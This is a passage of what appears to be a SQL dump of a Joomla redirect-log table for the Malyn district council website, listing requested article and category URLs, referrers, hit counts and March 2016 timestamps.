00:00:00',301),(27482,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=896:2013-01-17-07-42-35&lang=en&option=com_content&view=article','','','',1,0,'2016-03-24 14:22:46','0000-00-00 00:00:00',301),(27483,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-24 14:34:40','0000-00-00 00:00:00',301),(27484,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=449:2011-10-28-08-04-47&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-24 15:19:58','0000-00-00 00:00:00',301),(27485,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=878:2012-12-21-16-59-28&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-24 15:41:04','0000-00-00 00:00:00',301),(27486,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/966-pro-zvernennya-do-prezidenta-ukrajini-golovi-verkhovnoji-radi-ukrajini-prem-er-ministra-ukrajini-shchodo-zberezhennya-4-ji-zoni-posilenogo-radiologichnogo-kontrolyu','','','',1,0,'2016-03-24 19:02:57','0000-00-00 00:00:00',301),(27487,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1278:2014-04-11-13-44-30&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-03-24 19:46:56','0000-00-00 00:00:00',301),(27488,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1111:2013-10-22-16-06-36&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-24 20:53:10','0000-00-00 00:00:00',301),(27489,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-24 21:00:49','0000-00-00 00:00:00',301),(27490,'http://www.malyn-rayrada.org.ua/index.php?id=33:-20052011&Itemid=66&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-24 22:05:29','0000-00-00 00:00:00',301),(27491,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=610:2012-03-23-06-34-31&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-03-24 22:56:32','0000-00-00 00:00:00',301),(27492,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=799:2012-10-18-13-37-03&Itemid=84&lang=en&option=com_content&view=article','','','',4,0,'2016-03-24 22:58:20','0000-00-00 00:00:00',301),(27493,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-24 22:58:27','0000-00-00 00:00:00',301),(27494,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1238:2014-03-09-06-41-00&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-24 23:00:43','0000-00-00 00:00:00',301),(27495,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=960:-19-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-24 23:30:58','0000-00-00 00:00:00',301),(27496,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1290-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-iz-zemleustroyu-shchodo-vnesennya-zmin-v-proekt-formuvannya-teritoriji-i-stanovlennya-mezh-malinivskoji-silskoji-radi-malinskogo-rajonu-zhitomirskoji-oblasti','','','',2,0,'2016-03-24 23:54:02','0000-00-00 00:00:00',301),(27497,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53:--25102013-&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 01:08:14','0000-00-00 00:00:00',301),(27498,'http://www.malyn-rayrada.org.ua/index.php?id=42&Itemid=80&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-25 01:22:01','0000-00-00 00:00:00',301),(27499,'http://www.malyn-rayrada.org.ua/index.php?id=53:--25102013-&Itemid=94&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-25 01:27:52','0000-00-00 00:00:00',301),(27500,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 01:35:40','0000-00-00 00:00:00',301),(27501,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=475:2011-11-22-07-58-34&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-25 02:00:28','0000-00-00 00:00:00',301),(27502,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=463:-2007-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-25 03:02:13','0000-00-00 00:00:00',301),(27503,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=614:2012-03-26-16-06-35&lang=en&option=com_content&view=article','','','',2,0,'2016-03-25 03:15:16','0000-00-00 00:00:00',301),(27504,'http://www.malyn-rayrada.org.ua/readme.html','','http://www.malyn-rayrada.org.ua/readme.html','',1,0,'2016-03-25 03:48:33','0000-00-00 00:00:00',301),(27505,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?catid=59:--20062014-&id=1336:2014-06-10-11-01-06&lang=uk','','http://go.mail.ru/search_images','',1,0,'2016-03-25 03:52:39','0000-00-00 00:00:00',301),(27506,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1144:-lr&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-25 04:52:15','0000-00-00 00:00:00',301),(27507,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=861:-qq&Itemid=18&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-25 05:22:53','0000-00-00 00:00:00',301),(27508,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 05:26:51','0000-00-00 00:00:00',301),(27509,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=659:-2011-&lang=en&option=com_content&view=article','','','',1,0,'2016-03-25 06:15:56','0000-00-00 00:00:00',301),(27510,'http://malyn-rayrada.org.ua/register','','http://malyn-rayrada.org.ua','',1,0,'2016-03-25 06:33:45','0000-00-00 00:00:00',301),(27511,'http://www.malyn-rayrada.org.ua/index.php?id=39:-22022012-&Itemid=76&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-25 06:36:46','0000-00-00 00:00:00',301),(27512,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1058:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-25 06:49:14','0000-00-00 00:00:00',301),(27513,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39:-22022012-&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 07:45:07','0000-00-00 00:00:00',301),(27514,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&id=34:--15062011-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 08:24:01','0000-00-00 00:00:00',301),(27515,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 08:41:39','0000-00-00 00:00:00',301),(27516,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 09:37:35','0000-00-00 00:00:00',301),(27517,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=580:-l-r-2012-2016-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-25 09:47:20','0000-00-00 00:00:00',301),(27518,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=206:2010-12-15-14-19-27&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-25 09:57:21','0000-00-00 00:00:00',301),(27519,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39:-22022012-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 10:53:36','0000-00-00 00:00:00',301),(27520,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=633:-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-25 10:58:05','0000-00-00 00:00:00',301),(27521,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-25 12:53:56','0000-00-00 00:00:00',301),(27522,'http://www.malyn-rayrada.org.ua/index.php/1401-vidbulas-5-sesiya-malinskoji-rajonnoji-radi','','','',1,0,'2016-03-25 13:31:41','0000-00-00 00:00:00',301),(27523,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=530:-4050-vi-l-r-1-2013-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-25 14:15:30','0000-00-00 00:00:00',301),(27524,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32&id=641:2012-04-03-12-52-00&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-25 16:09:21','0000-00-00 00:00:00',301),(27525,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=en&layout=blog&limitstart=40&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 16:49:11','0000-00-00 00:00:00',301),(27526,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39:-22022012-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2016-03-25 18:16:50','0000-00-00 00:00:00',301),(27527,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=997:-27-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-03-25 18:20:21','0000-00-00 00:00:00',301),(27528,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&id=57:--15042014-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-25 18:32:35','0000-00-00 00:00:00',301),(27529,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=934:---------6---16112010-5---------------&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-25 18:50:33','0000-00-00 00:00:00',301),(27530,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=775:2012-10-02-09-35-53&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-25 19:47:08','0000-00-00 00:00:00',301),(27531,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=830:2012-11-27-08-09-31&Itemid=14&lang=ru&option=com_content&view=article','','','',8,0,'2016-03-25 19:57:07','0000-00-00 00:00:00',301),(27532,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=279:2011-03-31-08-20-23&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-25 20:12:21','0000-00-00 00:00:00',301),(27533,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30&id=229:-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-25 20:44:29','0000-00-00 00:00:00',301),(27534,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=321:------------l---------r--2011-2016-&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-25 20:54:43','0000-00-00 00:00:00',301),(27535,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1069:23--------&lang=en&option=com_content&view=article','','','',1,0,'2016-03-25 21:18:08','0000-00-00 00:00:00',301),(27536,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=680:2012-05-17-10-02-41&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-25 21:44:55','0000-00-00 00:00:00',301),(27537,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1070:2013-08-23-04-27-00&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-25 22:04:12','0000-00-00 00:00:00',301),(27538,'http://www.malyn-rayrada.org.ua/index.php?id=37&Itemid=72&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-25 22:56:02','0000-00-00 00:00:00',301),(27539,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2016-03-25 22:57:39','0000-00-00 00:00:00',301),(27540,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=830:2012-11-27-08-09-31&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-25 23:53:38','0000-00-00 00:00:00',301),(27541,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1194:-2012-2015-&Itemid=97&lang=en&option=com_content&view=article','','','',1,0,'2016-03-26 01:21:01','0000-00-00 00:00:00',301),(27542,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=890:2013-01-06-09-42-40&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-26 01:34:02','0000-00-00 00:00:00',301),(27543,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1085-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-gr-andrijchuk-t-i-ta-gr-andrijchuk-v-i','','','',5,0,'2016-03-26 02:04:29','0000-00-00 00:00:00',301),(27544,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53:--25102013-&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',2,0,'2016-03-26 02:46:39','0000-00-00 00:00:00',301),(27545,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/862-pro-nadannya-dozvolu-na-vlashtuvannya-murgi-p-o-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odinokikh-nepratsezdatnikh-gromadyan/','','','',2,0,'2016-03-26 03:11:38','0000-00-00 00:00:00',301),(27546,'http://www.malyn-rayrada.org.ua/index.php?Itemid=58&catid=27&id=142:2010-10-15-06-19-49&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-26 03:35:52','0000-00-00 00:00:00',301),(27547,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30:--30122010-&id=230:---3----6--30--2010-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-26 03:39:50','0000-00-00 00:00:00',301),(27548,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1107:c-&lang=en&option=com_content&view=article','','','',1,0,'2016-03-26 03:46:31','0000-00-00 00:00:00',301),(27549,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=330:2011-05-20-16-28-08&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-26 04:34:34','0000-00-00 00:00:00',301),(27550,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=784:-9-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-26 06:43:31','0000-00-00 00:00:00',301),(27551,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=439:2011-10-21-16-22-19&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-26 06:48:05','0000-00-00 00:00:00',301),(27552,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=860:09&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-26 07:38:46','0000-00-00 00:00:00',301),(27553,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1106:-qq','','','',1,0,'2016-03-26 09:54:59','0000-00-00 00:00:00',301),(27554,'http://www.malyn-rayrada.org.ua/index.php?id=49:--12042013-&Itemid=88&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-26 10:46:26','0000-00-00 00:00:00',301),(27555,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=702:-2011-2013-&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-03-26 10:49:19','0000-00-00 00:00:00',301),(27556,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1086:2013-09-16-13-00-16&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-26 10:53:58','0000-00-00 00:00:00',301),(27557,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1034:2013-06-23-15-11-25&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-03-26 11:05:41','0000-00-00 00:00:00',301),(27558,'http://www.malyn-rayrada.org.ua/index.php/244-ekzotiki-za-rahunok-bjudzhetu-ne-bude/','','','',2,0,'2016-03-26 11:11:38','0000-00-00 00:00:00',301),(27559,'http://www.malyn-rayrada.org.ua/index.php/1377-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-5-sesiyu-rajonnoji-radi-7-sklikannya','','https://www.google.com.ua','',8,0,'2016-03-26 12:41:13','0000-00-00 00:00:00',301),(27560,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=719:-lr&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-26 12:49:07','0000-00-00 00:00:00',301),(27561,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=682:-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-26 12:50:07','0000-00-00 00:00:00',301),(27562,'http://www.malyn-rayrada.org.ua/index.php/1378-vitaemo-iz-svyatom-vesni?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-03-26 13:16:45','0000-00-00 00:00:00',301),(27563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=234:2011-01-13-06-57-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-03-26 13:35:40','0000-00-00 00:00:00',301),(27564,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=598:2012-02-29-14-13-44&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-26 15:26:00','0000-00-00 00:00:00',301),(27565,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=512:2011-12-21-12-46-13&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-26 16:21:34','0000-00-00 00:00:00',301),(27566,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-26 16:45:15','0000-00-00 00:00:00',301),(27567,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1097:2013-09-25-08-35-50&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-03-26 16:45:19','0000-00-00 00:00:00',301),(27568,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=918:----------2013-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-26 16:52:00','0000-00-00 00:00:00',301),(27569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=799:2012-10-18-13-37-03&catid=45:--14112012-&Itemid=84&lang=en','','','',7,0,'2016-03-26 17:17:00','0000-00-00 00:00:00',301),(27570,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-26 17:17:41','0000-00-00 00:00:00',301),(27571,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=772:-2011-2012-&Itemid=84&lang=uk&option=com_content&view=article','','','',6,0,'2016-03-26 17:17:46','0000-00-00 00:00:00',301),(27572,'http://malyn-rayrada.org.ua/index.php?catid=38&id=464:2011-11-11-12-15-19&itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-26 17:23:04','0000-00-00 00:00:00',301),(27573,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=13:2010-06-06-03-57-58&id=13:2010-06-06-04-07-00&itemid=33&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-26 18:35:29','0000-00-00 00:00:00',301),(27574,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=788:-lr-2012-2015-&Itemid=84&lang=ru&option=com_content&view=article','','','',7,0,'2016-03-26 18:40:02','0000-00-00 00:00:00',301),(27575,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=971:-2012-&Itemid=88&lang=ru&option=com_content&view=article','','','',7,0,'2016-03-26 19:10:21','0000-00-00 00:00:00',301),(27576,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&id=31:-25032011&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2016-03-26 19:49:24','0000-00-00 00:00:00',301),(27577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=34:2010-06-10-06-16-13&catid=11&Itemid=16&lang=uk','','','',6,0,'2016-03-26 21:34:39','0000-00-00 00:00:00',301),(27578,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31:-25032011&id=275:---------------2011-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-26 22:00:46','0000-00-00 00:00:00',301),(27579,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=941:2013-02-27-14-30-15&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-26 22:04:52','0000-00-00 00:00:00',301),(27580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1041:2013-07-02-13-55-38&catid=11&lang=uk','','','',2,0,'2016-03-26 23:04:06','0000-00-00 00:00:00',301),(27581,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=31&layout=blog&Itemid=62&lang=ru','','','',4,0,'2016-03-26 23:35:52','0000-00-00 00:00:00',301),(27582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=57:2010-06-25-11-06-48&catid=11&Itemid=16&lang=en','','','',3,0,'2016-03-27 00:06:22','0000-00-00 00:00:00',301),(27583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=57:2010-06-25-11-06-48&catid=11&Itemid=16&lang=ru','','','',2,0,'2016-03-27 00:10:32','0000-00-00 00:00:00',301),(27584,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=408:-2011-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-27 00:21:25','0000-00-00 00:00:00',301),(27585,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-27 00:31:33','0000-00-00 00:00:00',301),(27586,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=750:2012-09-01-09-40-02&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-27 01:15:06','0000-00-00 00:00:00',301),(27587,'http://www.malyn-rayrada.org.ua/index.php/1377-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-5-sesiyu-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-03-27 02:22:41','0000-00-00 00:00:00',301),(27588,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=475:2011-11-22-07-58-34&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-27 02:51:26','0000-00-00 00:00:00',301),(27589,'http://malyn-rayrada.org.ua/index.php/731-pro-ekonomiju-derzhavnih-koshtiv-ta-nedopushhennja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-03-27 05:36:31','0000-00-00 00:00:00',301),(27590,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44','','','',14,0,'2016-03-27 07:53:49','0000-00-00 00:00:00',301),(27591,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1:2010-06-05-13-18-17&catid=9:2010-06-05-12-55-45&Itemid=11&lang=uk','','','',1,0,'2016-03-27 08:06:27','0000-00-00 00:00:00',301),(27592,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=683:------------------------2012-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-27 08:25:01','0000-00-00 00:00:00',301),(27593,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=540:-2010-2015-&catid=39&Itemid=76&lang=uk','','','',5,0,'2016-03-27 08:28:27','0000-00-00 00:00:00',301),(27594,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/426-visti-iz-pirizhok-za-materialami-trs-polissja','','','',6,0,'2016-03-27 08:49:29','0000-00-00 00:00:00',301),(27595,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=425:-2011-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-27 08:49:48','0000-00-00 00:00:00',301),(27596,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01?start=10','','','',2,0,'2016-03-27 09:39:14','0000-00-00 00:00:00',301),(27597,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2016-03-27 11:03:05','0000-00-00 00:00:00',301),(27598,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=703:-2012-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-27 11:55:43','0000-00-00 00:00:00',301),(27599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=281:-i-2011-&catid=11&lang=uk','','','',2,0,'2016-03-27 13:02:07','0000-00-00 00:00:00',301),(27600,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-27 13:06:01','0000-00-00 00:00:00',301),(27601,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=836:-6732012&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-27 13:06:07','0000-00-00 00:00:00',301),(27602,'http://www.malyn-rayrada.org.ua/index.php?id=43&Itemid=82&lang=en&layout=blog&limitstart=25&option=com_content&view=category','','','',1,0,'2016-03-27 13:18:53','0000-00-00 00:00:00',301),(27603,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1069:23--------&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-27 13:39:10','0000-00-00 00:00:00',301),(27604,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=318:-2007-2011&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-27 13:42:49','0000-00-00 00:00:00',301),(27605,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-27 13:58:28','0000-00-00 00:00:00',301),(27606,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=896:2013-01-17-07-42-35&Itemid=86&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-27 13:59:00','0000-00-00 00:00:00',301),(27607,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1:2010-06-05-13-18-17&catid=9:2010-06-05-12-55-45&Itemid=11&lang=uk','','','',3,0,'2016-03-27 14:01:04','0000-00-00 00:00:00',301),(27608,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/1210-mikola-trokhimovich-prokopenko-topo-j-gidronimika-sil-ta-mistsevostej-vorsivskoji-silskoji-radi','','https://www.google.com.ua','',13,0,'2016-03-27 14:58:29','0000-00-00 00:00:00',301),(27609,'http://www.malyn-rayrada.org.ua/index.php?id=45:--14112012-&Itemid=3&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2016-03-27 15:12:46','0000-00-00 00:00:00',301),(27610,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=972:2013-03-19-10-50-05&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2016-03-27 15:46:25','0000-00-00 00:00:00',301),(27611,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=996:2013-04-25-12-09-57&Itemid=17&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-27 15:46:58','0000-00-00 00:00:00',301),(27612,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=805:2012-10-30-13-35-53&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-27 15:56:55','0000-00-00 00:00:00',301),(27613,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=753:2012-09-05-09-48-36&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-27 17:55:24','0000-00-00 